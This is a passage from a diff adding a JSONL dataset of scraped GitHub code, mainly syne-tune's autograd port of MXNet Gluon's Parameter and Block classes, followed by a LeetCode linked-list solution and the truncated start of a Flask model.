diff --git "a/2224.jsonl" "b/2224.jsonl" new file mode 100644--- /dev/null +++ "b/2224.jsonl" @@ -0,0 +1,1452 @@ +{"seq_id":"12723131343","text":"import threading\nimport warnings\nimport re\nfrom collections import OrderedDict\nimport autograd.numpy as anp\nfrom autograd.builtins import isinstance\n\n__all__ = [\"Block\", \"Parameter\", \"ParameterDict\"]\n\n\ndef _indent(s_, numSpaces):\n \"\"\"Indent string\"\"\"\n s = s_.split(\"\\n\")\n if len(s) == 1:\n return s_\n first = s.pop(0)\n s = [first] + [(numSpaces * \" \") + line for line in s]\n s = \"\\n\".join(s)\n return s\n\n\ndef shape_is_known(shape):\n \"\"\"Check whether a shape is completely known with or without np semantics.\n Please see the doc of :func:`is_np_shape` for more details.\n \"\"\"\n if shape is None:\n return False\n unknown_dim_size = -1\n if len(shape) == 0:\n return unknown_dim_size == -1\n for dim_size in shape:\n if dim_size == unknown_dim_size:\n return False\n assert (\n dim_size > unknown_dim_size\n ), \"shape dimension size cannot be less than {}, while \" \"received {}\".format(\n unknown_dim_size, dim_size\n )\n return True\n\n\nclass Parameter:\n \"\"\"A Container holding parameters (weights) of Blocks.\n :py:class:`Parameter` holds a copy of the parameter on each :py:class:`Context` after\n it is initialized with ``Parameter.initialize(...)``. If :py:attr:`grad_req` is\n not ``'null'``, it will also hold a gradient array on each :py:class:`Context`::\n x = np.zeros((16, 100))\n w = Parameter('fc_weight', shape=(16, 100), init=np.random.uniform)\n w.initialize()\n b.initialize()\n z = x + w.data\n Parameters\n ----------\n name : str\n Name of this parameter.\n grad_req : {'write', 'add', 'null'}, default 'write'\n Specifies how to update gradient to grad arrays.\n - ``'write'`` means everytime gradient is written to grad :py:class:`NDArray`.\n - ``'add'`` means everytime gradient is added to the grad :py:class:`NDArray`. You need\n to manually call ``zero_grad()`` to clear the gradient buffer before each\n iteration when using this option.\n - 'null' means gradient is not requested for this parameter. gradient arrays\n will not be allocated.\n shape : int or tuple of int, default None\n Shape of this parameter. By default shape is not specified. Parameter with\n unknown shape can be used for :py:class:`Symbol` API, but ``init`` will throw an error\n when using :py:class:`NDArray` API.\n dtype : numpy.dtype or str, default 'float64'\n Data type of this parameter. For example, ``numpy.float64`` or ``'float64'``.\n lr_mult : float, default 1.0\n Learning rate multiplier. Learning rate will be multiplied by lr_mult\n when updating this parameter with optimizer.\n wd_mult : float, default 1.0\n Weight decay multiplier (L2 regularizer coefficient). Works similar to lr_mult.\n init : Initializer, default None\n Initializer of this parameter. Will use the global initializer by default.\n stype: {'default', 'row_sparse', 'csr'}, defaults to 'default'.\n The storage type of the parameter.\n grad_stype: {'default', 'row_sparse', 'csr'}, defaults to 'default'.\n The storage type of the parameter's gradient.\n Attributes\n ----------\n grad_req : {'write', 'add', 'null'}\n This can be set before or after initialization. Setting ``grad_req`` to ``'null'``\n with ``x.grad_req = 'null'`` saves memory and computation when you don't\n need gradient w.r.t x.\n lr_mult : float\n Local learning rate multiplier for this Parameter. The actual learning rate\n is calculated with ``learning_rate * lr_mult``. You can set it with\n ``param.lr_mult = 2.0``\n wd_mult : float\n Local weight decay multiplier for this Parameter.\n \"\"\"\n\n def __init__(\n self,\n name,\n grad_req=\"write\",\n shape=None,\n dtype=anp.float64,\n lr_mult=1.0,\n wd_mult=1.0,\n init=None,\n allow_deferred_init=False,\n differentiable=True,\n stype=\"default\",\n grad_stype=\"default\",\n ):\n self._var = None\n self._data = None\n self._grad = None\n self._ctx_list = None\n self._ctx_map = None\n self._trainer = None\n self._deferred_init = ()\n self._differentiable = differentiable\n if allow_deferred_init:\n raise NotImplementedError(\n \"allow_deferred_init is not a valid option in autograd\"\n )\n self._allow_deferred_init = allow_deferred_init\n self._grad_req = None\n if isinstance(shape, int):\n shape = (shape,)\n self._shape = shape\n self.name = name\n self._dtype = dtype\n self.lr_mult = lr_mult\n self.wd_mult = wd_mult\n self.grad_req = grad_req\n self.init = init\n # sparse related storage type information\n valid_stypes = [\"default\"]\n assert grad_stype in valid_stypes, (\n \"grad_stype for Parameter '%s' must be \"\n \"one of 'default', 'row_sparse', or 'csr', but got '%s'\"\n % (name, grad_stype)\n )\n assert stype in valid_stypes, (\n \"stype for Parameter '%s' must be \"\n \"one of 'default', 'row_sparse', or 'csr', but got '%s'\" % (name, stype)\n )\n self._grad_stype = grad_stype\n self._stype = stype\n\n def __repr__(self):\n s = \"Parameter {name} (shape={shape}, dtype={dtype})\"\n return s.format(name=self.name, shape=self.shape, dtype=self.dtype)\n\n @property\n def grad_req(self):\n return self._grad_req\n\n @grad_req.setter\n def grad_req(self, req):\n assert req in [\"write\", \"add\", \"null\"], (\n \"grad_req must be one of 'write', 'add', or 'null', but got '%s'\" % req\n )\n if not self._differentiable:\n req = \"null\"\n if self._grad_req == req:\n return\n self._grad_req = req\n if req == \"null\" and self._grad is not None:\n self._grad = None\n self._data = [i.detach() for i in self._data]\n elif self._data is not None:\n self._init_grad()\n\n @property\n def dtype(self):\n \"\"\"The type of the parameter.\n Setting the dtype value is equivalent to casting the value of the parameter\n \"\"\"\n return self._dtype\n\n @dtype.setter\n def dtype(self, dtype):\n self.cast(dtype)\n\n @property\n def shape(self):\n \"\"\"The shape of the parameter.\n By default, an unknown dimension size is 0. However, when the NumPy semantic\n is turned on, unknown dimension size is -1.\n \"\"\"\n if self._shape is None:\n return None\n else:\n # Parameters shouldn't be zero-size. If one of its dimension is 0,\n # it means the parameter isn't initialized. In the NumPy semantics,\n # the unknown dimension should be marked with -1.\n return tuple(i if i != 0 else -1 for i in self._shape)\n\n @shape.setter\n def shape(self, new_shape):\n if self._shape is None:\n self._shape = new_shape\n return\n\n assert len(self._shape) == len(new_shape) and all(\n j in (-1, 0, i) for i, j in zip(new_shape, self._shape)\n ), \"Expected shape %s is incompatible with given shape %s.\" % (\n str(new_shape),\n str(self._shape),\n ) # -1 means unknown dim size in np_shape mode\n\n self._shape = new_shape\n\n def _check_and_get(self, arr_list, ctx):\n if arr_list is not None:\n if ctx is list:\n return arr_list\n if ctx is None:\n if len(arr_list) == 1:\n return arr_list[0]\n # else:\n # ctx = context.current_context()\n ctx_list = self._ctx_map[ctx.device_typeid & 1]\n if ctx.device_id < len(ctx_list):\n idx = ctx_list[ctx.device_id]\n if idx is not None:\n return arr_list[idx]\n raise RuntimeError(\n \"Parameter '%s' was not initialized on context %s. \"\n \"It was only initialized on %s.\"\n % (self.name, str(ctx), str(self._ctx_list))\n )\n if self._deferred_init:\n raise NotImplementedError(\"Cannot enable deferred init\")\n raise RuntimeError(\n \"Parameter '%s' has not been initialized. Note that \"\n \"you should initialize parameters and create Trainer \"\n \"with Block.collect_params() instead of Block.params \"\n \"because the later does not include Parameters of \"\n \"nested child Blocks\" % (self.name)\n )\n\n def _init_impl(self, data, ctx_list=None):\n \"\"\"Sets data and grad.\"\"\"\n self._data = [data]\n self._init_grad()\n\n def _init_grad(self):\n \"\"\"Initialize grad buffers.\"\"\"\n if self.grad_req == \"null\":\n self._grad = None\n return\n\n if self._grad_stype != \"default\":\n raise ValueError(\n \"numpy.zeros does not support stype = {}\".format(self._grad_stype)\n )\n self._grad = [anp.zeros(shape=i.shape, dtype=i.dtype) for i in self._data]\n\n # autograd.mark_variables(self._check_and_get(self._data, list),\n # self._grad, self.grad_req)\n\n def initialize(self, init=None, ctx=None, default_init=None, force_reinit=False):\n \"\"\"Initializes parameter and gradient arrays. Only used for :py:class:`NDArray` API.\n Parameters\n ----------\n init : Initializer\n The initializer to use. Overrides :py:meth:`Parameter.init` and default_init.\n ctx : Context or list of Context, defaults to :py:meth:`context.current_context()`.\n Initialize Parameter on given context. If ctx is a list of Context, a\n copy will be made for each context.\n .. note::\n Copies are independent arrays. User is responsible for keeping\n their values consistent when updating.\n Normally :py:class:`gluon.Trainer` does this for you.\n default_init : Initializer\n Default initializer is used when both :py:func:`init`\n and :py:meth:`Parameter.init` are ``None``.\n force_reinit : bool, default False\n Whether to force re-initialization if parameter is already initialized.\n Examples\n --------\n >>> weight = mx.gluon.Parameter('weight', shape=(2, 2))\n >>> weight.initialize(ctx=mx.cpu(0))\n >>> weight.data()\n [[-0.01068833 0.01729892]\n [ 0.02042518 -0.01618656]]\n \n >>> weight.grad()\n [[ 0. 0.]\n [ 0. 0.]]\n \n >>> weight.initialize(ctx=[mx.gpu(0), mx.gpu(1)])\n >>> weight.data(mx.gpu(0))\n [[-0.00873779 -0.02834515]\n [ 0.05484822 -0.06206018]]\n \n >>> weight.data(mx.gpu(1))\n [[-0.00873779 -0.02834515]\n [ 0.05484822 -0.06206018]]\n \n \"\"\"\n if default_init is None:\n default_init = anp.random.uniform\n if self._data is not None and not force_reinit:\n warnings.warn(\n \"Parameter '%s' is already initialized, ignoring. \"\n \"Set force_reinit=True to re-initialize.\" % self.name,\n stacklevel=2,\n )\n return\n self._data = self._grad = None\n\n # init -> self.init -> default_init\n if init is None:\n init = default_init if self.init is None else self.init\n if not shape_is_known(self.shape):\n if self._allow_deferred_init:\n raise NotImplementedError(\"deferred_init not implemented for autograd\")\n return\n raise ValueError(\n \"Cannot initialize Parameter '%s' because it has \"\n \"invalid shape: %s.\" % (self.name, str(self.shape))\n )\n\n try:\n data = init(shape=self.shape)\n except TypeError:\n data = init(size=self.shape)\n self._init_impl(data, ctx_list=ctx)\n\n def reset_ctx(self, ctx):\n \"\"\"Re-assign Parameter to other contexts.\n Parameters\n ----------\n ctx : Context or list of Context, default ``context.current_context()``.\n Assign Parameter to given context. If ctx is a list of Context, a\n copy will be made for each context.\n \"\"\"\n return\n\n def set_data(self, data):\n \"\"\"Sets this parameter's value on all contexts.\"\"\"\n self.shape = data.shape\n\n if self._data is None:\n assert self._deferred_init, (\n \"Parameter '%s' has not been initialized\" % self.name\n )\n self._deferred_init = self._deferred_init[:3] + (data,)\n return\n\n # self._check_and_get(self._data, list)\n # added, raise no initialization error\n # for arr in self._check_and_get(self._data, list):\n # arr[:] = data\n for i in range(len(self._data)):\n self._data[i] = anp.array(data, copy=True)\n\n def data(self, ctx=None):\n \"\"\"Returns a copy of this parameter on one context. Must have been\n initialized on this context before. For sparse parameters, use\n :py:meth:`Parameter.row_sparse_data` instead.\n Parameters\n ----------\n ctx : Context\n Desired context.\n Returns\n -------\n NDArray on ctx\n \"\"\"\n if self._stype != \"default\":\n raise RuntimeError(\n \"Cannot return a copy of Parameter '%s' on ctx %s via data() \"\n \"because its storage type is %s. Please use row_sparse_data() \"\n \"instead.\" % (self.name, str(ctx), self._stype)\n )\n return self._check_and_get(self._data, ctx)\n\n def list_data(self):\n \"\"\"Returns copies of this parameter on all contexts, in the same order\n as creation. For sparse parameters, use :py:meth:`Parameter.list_row_sparse_data`\n instead.\n Returns\n -------\n list of NDArrays\n \"\"\"\n if self._stype != \"default\":\n raise RuntimeError(\n \"Cannot return copies of Parameter '%s' on all contexts via \"\n \"list_data() because its storage type is %s. Please use \"\n \"row_sparse_data() instead.\" % (self.name, self._stype)\n )\n return self._check_and_get(self._data, list)\n\n def grad(self, ctx=None):\n \"\"\"Returns a gradient buffer for this parameter on one context.\n Parameters\n ----------\n ctx : Context\n Desired context.\n \"\"\"\n if self._data is not None and self._grad is None:\n raise RuntimeError(\n \"Cannot get gradient array for Parameter '%s' \"\n \"because grad_req='null'\" % (self.name)\n )\n return self._check_and_get(self._grad, ctx)\n\n def list_grad(self):\n \"\"\"Returns gradient buffers on all contexts, in the same order\n as :py:meth:`values`.\"\"\"\n if self._data is not None and self._grad is None:\n raise RuntimeError(\n \"Cannot get gradient array for Parameter '%s' \"\n \"because grad_req='null'\" % (self.name)\n )\n return self._check_and_get(self._grad, list)\n\n def list_ctx(self):\n \"\"\"Returns a list of contexts this parameter is initialized on.\"\"\"\n if self._data is None:\n if self._deferred_init:\n return self._deferred_init[1]\n raise RuntimeError(\"Parameter '%s' has not been initialized\" % self.name)\n return self._ctx_list\n\n def zero_grad(self):\n \"\"\"Sets gradient buffer on all contexts to 0. No action is taken if\n parameter is uninitialized or doesn't require gradient.\"\"\"\n if self._grad is None:\n return\n for i in self._grad:\n i[:] = 0\n\n def cast(self, dtype):\n \"\"\"Cast data and gradient of this Parameter to a new data type.\n Parameters\n ----------\n dtype : str or numpy.dtype\n The new data type.\n \"\"\"\n self._dtype = dtype\n if self._data is None:\n return\n\n self._data = [i.astype(dtype) for i in self._data]\n if self._grad is None:\n return\n self._grad = [i.astype(dtype) for i in self._grad]\n\n\nclass ParameterDict:\n \"\"\"A dictionary managing a set of parameters.\n Parameters\n ----------\n prefix : str, default ``''``\n The prefix to be prepended to all Parameters' names created by this dict.\n shared : ParameterDict or None\n If not ``None``, when this dict's :py:meth:`get` method creates a new parameter, will\n first try to retrieve it from \"shared\" dict. Usually used for sharing\n parameters with another Block.\n \"\"\"\n\n def __init__(self, prefix=\"\", shared=None):\n self._prefix = prefix\n self._params = OrderedDict()\n self._shared = shared\n\n def __repr__(self):\n s = \"{name}(\\n{content}\\n)\"\n name = self._prefix + \" \" if self._prefix else \"\"\n return s.format(\n name=name,\n content=\"\\n\".join([_indent(\" {0}\".format(v), 2) for v in self.values()]),\n )\n\n def __getitem__(self, key):\n return self._params[key]\n\n def __iter__(self):\n return iter(self._params)\n\n def items(self):\n return self._params.items()\n\n def keys(self):\n return self._params.keys()\n\n def values(self):\n return self._params.values()\n\n @property\n def prefix(self):\n \"\"\"Prefix of this dict. It will be prepended to :py:class:`Parameter`s' name created\n with :py:func:`get`.\"\"\"\n return self._prefix\n\n def _get_impl(self, name):\n if name in self._params:\n return self._params[name]\n if self._shared is not None and name in self._shared._params:\n self._params[name] = self._shared._params[name]\n return self._shared._params[name]\n return None\n\n def get(self, name, **kwargs):\n \"\"\"Retrieves a :py:class:`Parameter` with name ``self.prefix+name``. If not found,\n :py:func:`get` will first try to retrieve it from \"shared\" dict. If still not\n found, :py:func:`get` will create a new :py:class:`Parameter` with key-word arguments and\n insert it to self.\n Parameters\n ----------\n name : str\n Name of the desired Parameter. It will be prepended with this dictionary's\n prefix.\n **kwargs : Dict[str, Any]\n The rest of key-word arguments for the created :py:class:`Parameter`.\n Returns\n -------\n Parameter\n The created or retrieved :py:class:`Parameter`.\n \"\"\"\n name = self.prefix + name\n param = self._get_impl(name)\n if param is None: # pylint: disable=too-many-nested-blocks\n param = Parameter(name, **kwargs)\n self._params[name] = param\n else:\n for k, v in kwargs.items():\n if hasattr(param, k) and getattr(param, k) is not None:\n existing = getattr(param, k)\n if k == \"shape\" and len(v) == len(existing):\n inferred_shape = []\n matched = True\n for dim1, dim2 in zip(v, existing):\n if dim1 != dim2 and dim1 > 0 and dim2 > 0:\n matched = False\n break\n elif dim1 == dim2:\n inferred_shape.append(dim1)\n elif dim1 in (\n 0,\n -1,\n ): # -1 means unknown dim size in np_shape mode\n inferred_shape.append(dim2)\n else:\n inferred_shape.append(dim1)\n\n if matched:\n param._shape = tuple(inferred_shape)\n continue\n elif k == \"dtype\" and anp.dtype(v) == anp.dtype(existing):\n continue\n\n assert v is None or v == existing, (\n \"Cannot retrieve Parameter '%s' because desired attribute \"\n \"does not match with stored for attribute '%s': \"\n \"desired '%s' vs stored '%s'.\"\n % (name, k, str(v), str(getattr(param, k)))\n )\n else:\n setattr(param, k, v)\n return param\n\n def update(self, other):\n \"\"\"Copies all Parameters in ``other`` to self.\"\"\"\n for k, v in other.items():\n if k in self._params:\n assert self._params[k] is v, (\n \"Cannot update self with other because they have different \"\n \"Parameters with the same name '%s'\" % k\n )\n\n for k, v in other.items():\n self._params[k] = v\n\n def initialize(self, init=None, ctx=None, verbose=False, force_reinit=False):\n \"\"\"Initializes all Parameters managed by this dictionary to be used for :py:class:`NDArray`\n API. It has no effect when using :py:class:`Symbol` API.\n Parameters\n ----------\n init : Initializer\n Global default Initializer to be used when :py:meth:`Parameter.init` is ``None``.\n Otherwise, :py:meth:`Parameter.init` takes precedence.\n ctx : Context or list of Context\n Keeps a copy of Parameters on one or many context(s).\n verbose : bool, default False\n Whether to verbosely print out details on initialization.\n force_reinit : bool, default False\n Whether to force re-initialization if parameter is already initialized.\n \"\"\"\n if init is None:\n init = anp.random.uniform\n if verbose:\n init.set_verbosity(verbose=verbose)\n for _, v in self.items():\n v.initialize(\n init=None, ctx=ctx, default_init=init, force_reinit=force_reinit\n )\n\n def reset_ctx(self, ctx):\n \"\"\"Re-assign all Parameters to other contexts.\n Parameters\n ----------\n ctx : Context or list of Context, default :py:meth:`context.current_context()`.\n Assign Parameter to given context. If ctx is a list of Context, a\n copy will be made for each context.\n \"\"\"\n for i in self.values():\n i.reset_ctx(ctx)\n\n def list_ctx(self):\n \"\"\"Returns a list of all the contexts on which the underlying Parameters\n are initialized.\"\"\"\n s = set()\n for i in self.values():\n s.update(i.list_ctx())\n return list(s)\n\n def setattr(self, name, value):\n \"\"\"Set an attribute to a new value for all Parameters.\n For example, set grad_req to null if you don't need gradient w.r.t a\n model's Parameters::\n model.collect_params().setattr('grad_req', 'null')\n or change the learning rate multiplier::\n model.collect_params().setattr('lr_mult', 0.5)\n Parameters\n ----------\n name : str\n Name of the attribute.\n value : valid type for attribute name\n The new value for the attribute.\n \"\"\"\n for i in self.values():\n setattr(i, name, value)\n\n\nclass NameManager:\n \"\"\"NameManager to do automatic naming.\n Developers can also inherit from this class to change naming behavior.\n \"\"\"\n\n _current = threading.local()\n\n def __init__(self):\n self._counter = {}\n self._old_manager = None\n\n def get(self, name, hint):\n \"\"\"Get the canonical name for a symbol.\n This is the default implementation.\n If the user specifies a name,\n the user-specified name will be used.\n When user does not specify a name, we automatically generate a\n name based on the hint string.\n Parameters\n ----------\n name : str or None\n The name specified by the user.\n hint : str\n A hint string, which can be used to generate name.\n Returns\n -------\n full_name : str\n A canonical name for the symbol.\n \"\"\"\n if name:\n return name\n if hint not in self._counter:\n self._counter[hint] = 0\n name = \"%s%d\" % (hint, self._counter[hint])\n self._counter[hint] += 1\n return name\n\n def __enter__(self):\n if not hasattr(NameManager._current, \"value\"):\n NameManager._current.value = NameManager()\n self._old_manager = NameManager._current.value\n NameManager._current.value = self\n return self\n\n def __exit__(self, ptype, value, trace):\n assert self._old_manager\n NameManager._current.value = self._old_manager\n\n\nclass Prefix(NameManager):\n \"\"\"A name manager that attaches a prefix to all names.\n Examples\n --------\n >>> import mxnet as mx\n >>> data = mx.symbol.Variable('data')\n >>> with mx.name.Prefix('mynet_'):\n net = mx.symbol.FullyConnected(data, num_hidden=10, name='fc1')\n >>> net.list_arguments()\n ['data', 'mynet_fc1_weight', 'mynet_fc1_bias']\n \"\"\"\n\n def __init__(self, prefix):\n super(Prefix, self).__init__()\n self._prefix = prefix\n\n def get(self, name, hint):\n name = super(Prefix, self).get(name, hint)\n return self._prefix + name\n\n\n# initialize the default name manager\nNameManager._current.value = NameManager()\n\n\nclass _BlockScope:\n \"\"\"Scope for collecting child `Block` s.\"\"\"\n\n _current = threading.local()\n\n def __init__(self, block):\n self._block = block\n self._counter = {}\n self._old_scope = None\n self._name_scope = None\n\n @staticmethod\n def create(prefix, params, hint):\n \"\"\"Creates prefix and params for new `Block`.\"\"\"\n current = getattr(_BlockScope._current, \"value\", None)\n if current is None:\n if prefix is None:\n if not hasattr(NameManager._current, \"value\"):\n NameManager._current.value = NameManager()\n prefix = NameManager._current.value.get(None, hint) + \"_\"\n if params is None:\n params = ParameterDict(prefix)\n else:\n params = ParameterDict(params.prefix, params)\n return prefix, params\n\n if prefix is None:\n count = current._counter.get(hint, 0)\n prefix = \"%s%d_\" % (hint, count)\n current._counter[hint] = count + 1\n if params is None:\n parent = current._block.params\n params = ParameterDict(parent.prefix + prefix, parent._shared)\n else:\n params = ParameterDict(params.prefix, params)\n return current._block.prefix + prefix, params\n\n def __enter__(self):\n if self._block._empty_prefix:\n return self\n self._old_scope = getattr(_BlockScope._current, \"value\", None)\n _BlockScope._current.value = self\n self._name_scope = Prefix(self._block.prefix)\n self._name_scope.__enter__()\n return self\n\n def __exit__(self, ptype, value, trace):\n if self._block._empty_prefix:\n return\n self._name_scope.__exit__(ptype, value, trace)\n self._name_scope = None\n _BlockScope._current.value = self._old_scope\n\n\nclass Block:\n \"\"\"Base class for all neural network layers and models. Your models should\n subclass this class.\n :py:class:`Block` can be nested recursively in a tree structure. You can create and\n assign child :py:class:`Block` as regular attributes::\n from mxnet.gluon import Block, nn\n from mxnet import ndarray as F\n class Model(Block):\n def __init__(self, **kwargs):\n super(Model, self).__init__(**kwargs)\n # use name_scope to give child Blocks appropriate names.\n with self.name_scope():\n self.dense0 = nn.Dense(20)\n self.dense1 = nn.Dense(20)\n def forward(self, x):\n x = F.relu(self.dense0(x))\n return F.relu(self.dense1(x))\n model = Model()\n model.initialize(ctx=mx.cpu(0))\n model(F.zeros((10, 10), ctx=mx.cpu(0)))\n Child :py:class:`Block` assigned this way will be registered and :py:meth:`collect_params`\n will collect their Parameters recursively. You can also manually register\n child blocks with :py:meth:`register_child`.\n Parameters\n ----------\n prefix : str\n Prefix acts like a name space. All children blocks created in parent block's\n :py:meth:`name_scope` will have parent block's prefix in their name.\n Please refer to\n `naming tutorial `__\n for more info on prefix and naming.\n params : ParameterDict or None\n :py:class:`ParameterDict` for sharing weights with the new :py:class:`Block`. For example,\n if you want ``dense1`` to share ``dense0``'s weights, you can do::\n dense0 = nn.Dense(20)\n dense1 = nn.Dense(20, params=dense0.collect_params())\n \"\"\"\n\n def __init__(self, prefix=None, params=None):\n self._empty_prefix = prefix == \"\"\n self._prefix, self._params = _BlockScope.create(prefix, params, self._alias())\n self._name = self._prefix[:-1] if self._prefix.endswith(\"_\") else self._prefix\n self._scope = _BlockScope(self)\n self._children = OrderedDict()\n self._reg_params = {}\n self._forward_hooks = OrderedDict()\n self._forward_pre_hooks = OrderedDict()\n\n def __repr__(self):\n s = \"{name}(\\n{modstr}\\n)\"\n modstr = \"\\n\".join(\n [\n \" ({key}): {block}\".format(key=key, block=_indent(block.__repr__(), 2))\n for key, block in self.__dict__.items()\n if isinstance(block, Block)\n ]\n )\n return s.format(name=self.__class__.__name__, modstr=modstr)\n\n def __setattr__(self, name, value):\n \"\"\"Registers parameters.\"\"\"\n\n if hasattr(self, name):\n existing = getattr(self, name)\n if isinstance(existing, (Parameter, Block)) and not isinstance(\n value, type(existing)\n ):\n raise TypeError(\n \"Changing attribute type for {name} from {type1} to {type2}\"\n \"is not allowed.\".format(\n name=name, type1=type(existing), type2=type(value)\n )\n )\n\n if isinstance(value, Block):\n self.register_child(value, name)\n elif isinstance(value, Parameter):\n assert name not in self._reg_params, (\n \"Overriding Parameter attribute %s is not allowed. \"\n \"If you want to share parameters between blocks, please set \"\n \"'params' at Block construction instead.\"\n )\n self._reg_params[name] = value\n\n super(Block, self).__setattr__(name, value)\n\n def _check_container_with_block(self):\n children = set(self._children.values())\n\n def _find_unregistered_block_in_container(data):\n # Find whether a nested container structure contains Blocks\n if isinstance(data, (list, tuple)):\n for ele in data:\n if _find_unregistered_block_in_container(ele):\n return True\n return False\n elif isinstance(data, dict):\n for _, v in data.items():\n if _find_unregistered_block_in_container(v):\n return True\n return False\n elif isinstance(data, Block):\n return not data in children\n else:\n return False\n\n for k, v in self.__dict__.items():\n if isinstance(v, (list, tuple, dict)) and not (\n k.startswith(\"__\") or k == \"_children\"\n ):\n if _find_unregistered_block_in_container(v):\n warnings.warn(\n '\"{name}\" is an unregistered container with Blocks. '\n \"Note that Blocks inside the list, tuple or dict will not be \"\n \"registered automatically. Make sure to register them using \"\n \"register_child() or switching to \"\n \"nn.Sequential/nn.HybridSequential instead. \".format(\n name=self.__class__.__name__ + \".\" + k\n ),\n stacklevel=3,\n )\n\n def _alias(self):\n return self.__class__.__name__.lower()\n\n @property\n def prefix(self):\n \"\"\"Prefix of this :py:class:`Block`.\"\"\"\n return self._prefix\n\n @property\n def name(self):\n \"\"\"Name of this :py:class:`Block`, without '_' in the end.\"\"\"\n return self._name\n\n def name_scope(self):\n \"\"\"Returns a name space object managing a child :py:class:`Block` and parameter\n names. Should be used within a ``with`` statement::\n with self.name_scope():\n self.dense = nn.Dense(20)\n Please refer to\n `the naming tutorial `__\n for more info on prefix and naming.\n \"\"\"\n return self._scope\n\n @property\n def params(self):\n \"\"\"Returns this :py:class:`Block`'s parameter dictionary (does not include its\n children's parameters).\"\"\"\n return self._params\n\n def collect_params(self, select=None):\n \"\"\"Returns a :py:class:`ParameterDict` containing this :py:class:`Block` and all of its\n children's Parameters(default), also can returns the select :py:class:`ParameterDict`\n which match some given regular expressions.\n For example, collect the specified parameters in ['conv1_weight', 'conv1_bias', 'fc_weight',\n 'fc_bias']::\n model.collect_params('conv1_weight|conv1_bias|fc_weight|fc_bias')\n or collect all parameters whose names end with 'weight' or 'bias', this can be done\n using regular expressions::\n model.collect_params('.*weight|.*bias')\n Parameters\n ----------\n select : str\n regular expressions\n Returns\n -------\n The selected :py:class:`ParameterDict`\n \"\"\"\n # We need to check here because blocks inside containers are not supported.\n self._check_container_with_block()\n ret = ParameterDict(self._params.prefix)\n if not select:\n ret.update(self.params)\n else:\n pattern = re.compile(select)\n ret.update(\n {\n name: value\n for name, value in self.params.items()\n if pattern.match(name)\n }\n )\n for cld in self._children.values():\n ret.update(cld.collect_params(select=select))\n return ret\n\n def _collect_params_with_prefix(self, prefix=\"\"):\n if prefix:\n prefix += \".\"\n ret = {prefix + key: val for key, val in self._reg_params.items()}\n for name, child in self._children.items():\n ret.update(child._collect_params_with_prefix(prefix + name))\n return ret\n\n def register_child(self, block, name=None):\n \"\"\"Registers block as a child of self. :py:class:`Block` s assigned to self as\n attributes will be registered automatically.\"\"\"\n if name is None:\n name = str(len(self._children))\n self._children[name] = block\n\n # def register_forward_pre_hook(self, hook):\n # r\"\"\"Registers a forward pre-hook on the block.\n # The hook function is called immediately before :func:`forward`.\n # It should not modify the input or output.\n # Parameters\n # ----------\n # hook : callable\n # The forward hook function of form `hook(block, input) -> None`.\n # Returns\n # -------\n # :class:`mxnet.gluon.utils.HookHandle`\n # \"\"\"\n # handle = HookHandle()\n # handle.attach(self._forward_pre_hooks, hook)\n # return handle\n\n # def register_forward_hook(self, hook):\n # r\"\"\"Registers a forward hook on the block.\n # The hook function is called immediately after :func:`forward`.\n # It should not modify the input or output.\n # Parameters\n # ----------\n # hook : callable\n # The forward hook function of form `hook(block, input, output) -> None`.\n # Returns\n # -------\n # :class:`mxnet.gluon.utils.HookHandle`\n # \"\"\"\n # handle = HookHandle()\n # handle.attach(self._forward_hooks, hook)\n # return handle\n\n def apply(self, fn):\n r\"\"\"Applies ``fn`` recursively to every child block as well as self.\n Parameters\n ----------\n fn : callable\n Function to be applied to each submodule, of form `fn(block)`.\n Returns\n -------\n this block\n \"\"\"\n for cld in self._children.values():\n cld.apply(fn)\n fn(self)\n return self\n\n def initialize(self, init=None, ctx=None, verbose=False, force_reinit=False):\n \"\"\"Initializes :py:class:`Parameter` s of this :py:class:`Block` and its children.\n Equivalent to ``block.collect_params().initialize(...)``\n Parameters\n ----------\n init : Initializer\n Global default Initializer to be used when :py:meth:`Parameter.init` is ``None``.\n Otherwise, :py:meth:`Parameter.init` takes precedence.\n ctx : Context or list of Context\n Keeps a copy of Parameters on one or many context(s).\n verbose : bool, default False\n Whether to verbosely print out details on initialization.\n force_reinit : bool, default False\n Whether to force re-initialization if parameter is already initialized.\n \"\"\"\n if init is None:\n init = anp.random.uniform\n self.collect_params().initialize(init, ctx, verbose, force_reinit)\n\n def hybridize(self, active=True, **kwargs):\n \"\"\"Please refer description of HybridBlock hybridize().\"\"\"\n for cld in self._children.values():\n cld.hybridize(active, **kwargs)\n\n def cast(self, dtype):\n \"\"\"Cast this Block to use another data type.\n Parameters\n ----------\n dtype : str or numpy.dtype\n The new data type.\n \"\"\"\n for child in self._children.values():\n child.cast(dtype)\n for _, param in self.params.items():\n param.cast(dtype)\n\n def __call__(self, *args):\n \"\"\"Calls forward. Only accepts positional arguments.\"\"\"\n # for hook in self._forward_pre_hooks.values():\n # hook(self, args)\n\n out = self.forward(*args)\n\n # for hook in self._forward_hooks.values():\n # hook(self, args, out)\n # if _mx_npx.is_np_array():\n # _check_all_np_ndarrays(out)\n return out\n\n def forward(self, *args):\n \"\"\"Overrides to implement forward computation using :py:class:`NDArray`. Only\n accepts positional arguments.\n Parameters\n ----------\n *args : list of NDArray\n Input tensors.\n \"\"\"\n raise NotImplementedError\n # pylint: disable= invalid-name\n\n def hybrid_forward(self, *args):\n return self(*args)\n","repo_name":"awslabs/syne-tune","sub_path":"syne_tune/optimizer/schedulers/searchers/bayesopt/gpautograd/gluon.py","file_name":"gluon.py","file_ext":"py","file_size_in_byte":40088,"program_lang":"python","lang":"en","doc_type":"code","stars":332,"dataset":"github-code","pt":"67"} +{"seq_id":"71878185175","text":"#!/usr/bin/python\n\n# Definiton for singly-linked list.\n\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution(object):\n def addTwoNumber(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n\n head = cur = ListNode(0)\n carry = 0\n while l1 or l2:\n val = carry\n if l1:\n val += l1.val\n l1 = l1.next\n if l2:\n val += l2.val\n l2 = l2.next\n\n cur.next = ListNode(val % 10)\n carry = val / 10\n cur = cur.next\n\n if carry == 1:\n cur.next = ListNode(1)\n\n return head.next\n","repo_name":"muryo/my-leetcode","sub_path":"002_Add_Two_Numbers.py","file_name":"002_Add_Two_Numbers.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73495037332","text":"from models.shared import db\nfrom datetime import datetime\nimport json\nimport base64\nimport requests\n\nclass Evaluation(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name 